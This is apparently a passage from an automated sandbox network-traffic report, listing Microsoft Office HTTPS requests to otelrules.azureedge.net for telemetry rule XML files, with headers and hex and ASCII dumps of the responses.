                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142545Z-1749fc9bdbddrtrhhC1DFWsq8000000002qg00000000bf2f
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        140192.168.2.54984913.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:45 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE0A2434F"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 6d493ab3-701e-0001-5aa7-34b110000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142545Z-1749fc9bdbd4dqj6hC1DFWr4n400000002k000000000hst2
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        141192.168.2.54985213.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:45 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1409
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDFC438CF"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 86712c9d-c01e-007a-5916-36b877000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142545Z-16547b76f7f4k79zhC1DFWu9y00000000ku000000000b9b5
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        142192.168.2.54985013.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:45 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE54CA33F"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 1d414214-201e-0003-4d32-2cf85a000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142545Z-16547b76f7fk9g8vhC1DFW825400000000h000000000h7d5
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        143192.168.2.54985113.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:45 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1372
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE6669CA7"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: c5fa2879-c01e-007a-0659-36b877000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142545Z-r178fb8d7656shmjhC1DFWu5kw00000002mg00000000evqw
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:45 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        144192.168.2.54985313.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:46 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1408
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE1038EF2"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 295439a2-001e-0065-3ad2-2c0b73000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142546Z-16547b76f7f67wxlhC1DFWah9w0000000kq000000000fygf
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        145192.168.2.54985613.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC192OUTGET /rules/rule702251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:46 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1389
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE0F427E7"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: e8cfdd16-001e-0028-2a00-36c49f000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142546Z-16547b76f7fkj7j4hC1DFW0a9g0000000krg00000000chue
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        146192.168.2.54985713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC192OUTGET /rules/rule702250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:46 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1352
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDD0A87E5"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 2c5022f9-601e-0032-4ea7-34eebb000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142546Z-1749fc9bdbdcm45lhC1DFWeab800000002m0000000002vn5
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        147192.168.2.54985813.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC192OUTGET /rules/rule702651v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:46 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1395
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDEC600CC"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 5d91defa-d01e-00ad-0cd2-2ce942000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142546Z-16547b76f7ftdm8dhC1DFWs13g0000000krg00000000b0u7
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
